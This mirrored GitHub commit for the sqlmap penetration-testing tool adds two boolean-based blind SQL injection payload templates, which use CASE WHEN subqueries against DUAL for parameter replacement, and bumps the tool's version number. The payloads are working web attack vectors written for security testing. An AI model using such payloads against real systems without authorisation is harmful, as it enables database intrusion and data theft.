Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit b4ebbae

Browse files
stamparmstamparm
committed
New payload(s)
1 parent 510197c commit b4ebbae

2 files changed

Lines changed: 33 additions & 1 deletion

File tree

lib/core/settings.py

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -19,7 +19,7 @@
1919
from lib.core.revision import getRevisionNumber
2020

2121
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
22-
VERSION = "1.0.5.101"
22+
VERSION = "1.0.5.102"
2323
REVISION = getRevisionNumber()
2424
STABLE = VERSION.count('.') <= 2
2525
VERSION_STRING = "sqlmap/%s#%s" % (VERSION, "stable" if STABLE else "dev")

xml/payloads/01_boolean_blind.xml

Lines changed: 32 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -489,6 +489,38 @@ Tag: <test>
489489
<!-- End of boolean-based blind tests - WHERE or HAVING clause -->
490490

491491
<!-- Boolean-based blind tests - Parameter replace -->
492+
<test>
493+
<title>Boolean-based blind - Parameter replace (DUAL)</title>
494+
<stype>1</stype>
495+
<level>1</level>
496+
<risk>1</risk>
497+
<clause>1,2,3</clause>
498+
<where>3</where>
499+
<vector>(CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)</vector>
500+
<request>
501+
<payload>(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)</payload>
502+
</request>
503+
<response>
504+
<comparison>(CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)</comparison>
505+
</response>
506+
</test>
507+
508+
<test>
509+
<title>Boolean-based blind - Parameter replace (DUAL) (original value)</title>
510+
<stype>1</stype>
511+
<level>2</level>
512+
<risk>1</risk>
513+
<clause>1,2,3</clause>
514+
<where>3</where>
515+
<vector>(CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)</vector>
516+
<request>
517+
<payload>(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)</payload>
518+
</request>
519+
<response>
520+
<comparison>(CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)</comparison>
521+
</response>
522+
</test>
523+
492524
<test>
493525
<title>MySQL &gt;= 5.0 boolean-based blind - Parameter replace</title>
494526
<stype>1</stype>

0 commit comments

Comments
 (0)